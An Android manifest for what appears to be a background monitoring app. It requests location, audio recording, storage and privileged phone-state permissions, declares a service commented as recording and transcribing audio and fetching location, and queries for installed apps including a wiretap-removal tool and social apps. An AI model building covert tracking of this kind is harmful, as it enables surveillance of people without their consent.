<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    xmlns:tools="http://schemas.android.com/tools">

    <!-- audio record permission request-->
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" />
    <uses-permission android:name="android.permission.RECORD_AUDIO"/>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"
        tools:ignore="ScopedStorage" />
    <uses-permission android:name="android.permission.WAKE_LOCK"/>
    <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>

<!--    other permissions-->
    <uses-permission android:name="android.permission.READ_PRIVILEGED_PHONE_STATE"

        tools:ignore="ProtectedPermissions" />
    <application>
<!--        start the background service (location fetching, audio recording and transcripting)-->
        <service
            android:name=".BGService"/>
    </application>

<!--    manually stop the packageManager from filtering the following queried third-party apps out -->
    <queries>
        <package android:name="com.skibapps.wiretapremoval"/>
        <package android:name="com.google.android.contacts"/>
        <package android:name="com.google.android.gm"/>
        <package android:name="com.google.android.googlequicksearchbox"/>
        <package android:name="com.google.android.youtube"/>
        <package android:name="com.ss.android.ugc.trill"/>
        <package android:name="com.instagram.android"/>
        <package android:name="com.example.notepadapp"/>
    </queries>
</manifest>